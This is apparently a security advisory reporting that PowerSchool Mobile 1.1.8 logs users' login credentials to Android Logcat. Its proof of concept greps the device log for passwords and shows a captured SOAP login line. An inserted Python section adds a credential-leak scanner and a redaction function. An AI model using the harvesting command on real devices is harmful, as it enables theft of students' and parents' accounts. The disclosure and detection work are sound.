- # Title: PowerSchool Mobile - Logging Sensitive Information
- # Application: PowerSchool Mobile
- # Version: 1.1.8
- # Software Link: https://play.google.com/store/apps/details?id=com.powerschool.portal
- # Company: PowerSchool Group LLC
- # Installs: 1,000,000+
- # Impact: An attacker who can read the device log can obtain the user's username and password for the app
- # Category: Mobile Apps
- # Tested on: Android 8
- ---Description---
- PowerSchool Mobile, the popular education app with more than 1 million installs, logs the username and password to Logcat during the login step. As a result, an attacker can obtain a user's PowerSchool Mobile ID and password simply by reading Logcat. In particular, on old Android versions prior to Android Jelly Bean, any installed app can access Logcat without any permission.
- ---Vendor feedback---
- We have reported this issue to the vendor, and they will fix this problem soon.
- ---PoC---
- 1. Try to log in to PowerSchool, entering a username and password.
- 2. Search for the password in the log:
- $ adb logcat | grep 'password'
- 11857 12122 D SoapCall: loginToPublicPortal request xml <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www...<username><![CDATA[jaeho.lee@rice.edu]]></username><password><![CDATA[myPasswordHere]]></password.</loginToPublicPortal></soap:Body></soap:Envelope>
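As an added example (not code from the advisory, the app or the vendor), the following Python shows both sides of this finding: the check a tester would run over captured logcat output to flag credential elements in logged SOAP envelopes, and the redaction a logging wrapper should apply before a request envelope is ever written to the log. The logcat lines are constructed to mirror the one above, with placeholder credentials.

```python
import re

# Constructed sample logcat output modelled on the advisory's line above;
# the credential values are placeholders, not real ones.
SAMPLE_LOGCAT = """\
11857 12122 D SoapCall: loginToPublicPortal request xml <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www...<username><![CDATA[student@example.edu]]></username><password><![CDATA[hunter2]]></password></loginToPublicPortal></soap:Body></soap:Envelope>
11857 12122 D SoapCall: getStudentData request xml <?xml version="1.0"?><soap:Envelope><soap:Body><getStudentData><studentId>42</studentId></getStudentData></soap:Body></soap:Envelope>
"""

# Element names whose text content must never reach the log.
SENSITIVE_TAGS = ("username", "password")

# Matches <tag>value</tag> with an optional CDATA wrapper. A regex is used
# instead of an XML parser because logged envelopes are often truncated
# (note the "..." above) and would not parse as well-formed documents.
_SENSITIVE_RE = re.compile(
    r"<(?P<tag>" + "|".join(SENSITIVE_TAGS) + r")>"
    r"(?P<open><!\[CDATA\[)?(?P<value>.*?)(?P<close>\]\]>)?</(?P=tag)>",
    re.DOTALL,
)


def redact_soap_credentials(text: str) -> str:
    """Return text with the content of sensitive elements replaced by [REDACTED].

    This is the transformation a logging wrapper should apply before writing a
    request envelope to Logcat; element structure is kept so the log still
    shows which request was sent, without the secret.
    """
    def _sub(m: "re.Match") -> str:
        return "<%s>%s[REDACTED]%s</%s>" % (
            m["tag"], m["open"] or "", m["close"] or "", m["tag"])
    return _SENSITIVE_RE.sub(_sub, text)


def find_leaked_credentials(logcat_text: str) -> list:
    """Scan logcat output and report every line carrying a sensitive element.

    Each finding records the line number and element name only; the leaked
    value itself is deliberately left out of the report.
    """
    findings = []
    for lineno, line in enumerate(logcat_text.splitlines(), start=1):
        for m in _SENSITIVE_RE.finditer(line):
            findings.append({"line": lineno, "tag": m["tag"]})
    return findings
```

Feed real `adb logcat` output to `find_leaked_credentials` to triage a build; a non-empty result is the defect this advisory describes.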
- ---Reporter---
- Jaeho Lee (Jaeho.Lee@rice.edu)
- Rice University